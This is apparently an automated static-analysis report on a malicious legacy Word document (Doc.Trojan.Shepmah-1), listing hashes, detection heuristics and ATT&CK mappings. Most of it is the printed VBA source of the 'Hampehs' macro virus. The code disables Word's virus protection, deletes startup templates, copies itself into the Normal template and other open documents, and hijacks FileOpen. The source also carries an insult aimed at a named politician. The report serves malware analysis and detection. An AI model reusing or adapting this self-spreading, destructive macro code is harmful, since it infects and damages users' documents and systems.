Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 491d8a45e79b1149…

MALICIOUS

Office (OLE)

77.5 KB Created: 2002-07-16 08:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 009a1a136df85e26eade2f520e44d967 SHA-1: 09ac7161d4e03dab53514e9227113d4bfefeba0e SHA-256: 491d8a45e79b11490a12be121cab5c7bfd1ded4049b9f84346e34dd5881ed251
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a legacy Word document containing VBA macros, including an AutoOpen macro, which is a common technique for malicious documents. The script attempts to copy itself to the Normal template and other documents, indicating a persistence or spreading mechanism. The ClamAV detection further supports its malicious nature. The embedded URL 'hampehs.cjb.net' is noted but flagged as benign.

Heuristics 5

  • ClamAV: Doc.Trojan.Shepmah-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Shepmah-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://hampehs.cjb.net In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14530 bytes
SHA-256: 148a0071417ebcf184c97e866b0dafb32c9cbdabb1f9d5cf8bb08149560e44f3
Detection
ClamAV: Doc.Trojan.Shepmah-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "hampehs"
'Hampesh v1.0b
'Release : 12/10/1999

'Dedicated to the biggest PUKIMAK in Malaysia!
'Dato' Seri Dr Mahathir Mohamed

Public Ushar_SB As Variant
Public Dah_Jumpe, Check As Boolean
Public actDoc, SloSlo As Object

Function Go_DingDang()
Dim coprasmi As String
On Error Resume Next

coprasmi = "hampehs"

With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
ToolsOptionsSave.GlobalDotPrompt = 0

For chett = 1 To 2
If NormalTemplate.VBProject.VBComponents.Item(coprasmi).Name <> coprasmi Then
    ddSrc = ActiveDocument.FullName
    ddDest = NormalTemplate.FullName
    Check = True
    Ushar_SB = NormalTemplate.VBProject.VBComponents.Item(2).Name
        Bunuh_SB ddDest
    Makan_Budak ddSrc, ddDest, coprasmi
End If
    
    If Dah_Jumpe = True Then
        Check = False
        ddDest = actDoc.FullName
        usharAct = actDoc
        Set SloSlo = actDoc
        ddSrc = NormalTemplate.FullName
    Else
        If ActiveDocument.VBProject.VBComponents.Item(coprasmi).Name <> coprasmi Then
            Check = False
            ddSrc = NormalTemplate.FullName
            ddDest = ActiveDocument.FullName
            usharAct = ddDest
            Set SloSlo = ActiveDocument
        Else: akuLerWoi = True
        End If
    End If
        If akuLerWoi = True Then GoTo pusin
            Ushar_SB = actDoc.VBProject.VBComponents.Item(2).Name
            Ushar_Awek = actDoc.VBProject.VBComponents.Item(3).Name
            
            If Ushar_SB = "hampehs" And Ushar_Awek = "DingDang" Then GoTo pusin
                
                Bunuh_SB ddDest
                Makan_Budak ddSrc, ddDest, coprasmi
            orait = True
    
pusin:
coprasmi = "DingDang"
Next chett

With Dialogs(wdDialogFileSummaryInfo)
    .Author = "DingDang Yang Kiyut"
    .Title = "Hampehs! What The Hell Is It?"
    .Subject = "It is other method saying SHIT!"
    .Comments = "This is only a beginning... wait for the worst to come after Hampehs. It will be much more worst! Visit Hampehs at http://hampehs.cjb.net for disinfection!"
    .Keywords = "I Love Shida!!"
    .Execute
End With

If orait = True Then SloSlo.SaveAs FileName:=SloSlo.FullName
End Function
Sub Bunuh_SB(Fail_SB)
    If Ushar_SB = "hampehs" Or Ushar_SB = "" Then GoTo tadak_sb
        Application.OrganizerDelete Fail_SB, Ushar_SB, wdOrganizerObjectProjectItems
tadak_sb:
End Sub
Sub Makan_Budak(Sos, Tuju, Stem)
On Error Resume Next
Set aplikasi = Application
aplikasi.OrganizerCopy Sos, Tuju, Stem, 3
If Check = False Then Set Desc = ActiveDocument Else Set Desc = NormalTemplate
Desc.VBProject.Description = "Hampehs [DD/UTM'99]"

End Sub
Sub AutoExec()
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With

End Sub
Sub AutoOpen()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled

Kill Application.StartupPath & "\*.dot"

Set actDoc = ActiveDocument

Go_DingDang

If Documents.Count > 1 Then
    Dim bil
    For bil = 1 To Documents.Count
        If Documents(bil).Name <> ActiveDocument.Name Then
        Set actDoc = Documents(bil)
        Dah_Jumpe = True
        Go_DingDang
        End If
    Next
End If


End Sub
Sub FileOpen()
WordBasic.disableautomacros True
If Dialogs(80).Show <> 0 Then WordBasic.disableautomacros False
AutoOpen
WordBasic.disableautomacros False
End Sub
Sub ViewVBCode()
On Error Resume Next
End Sub








Attribute VB_Name = "DingDang"
Attribute VB_Base = "0{29ADC29E-2509-4B36-BF84-61834BB94656}{7BAE74D0-4587-43EC-9E02-8323DA108FDB}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
At
... (truncated)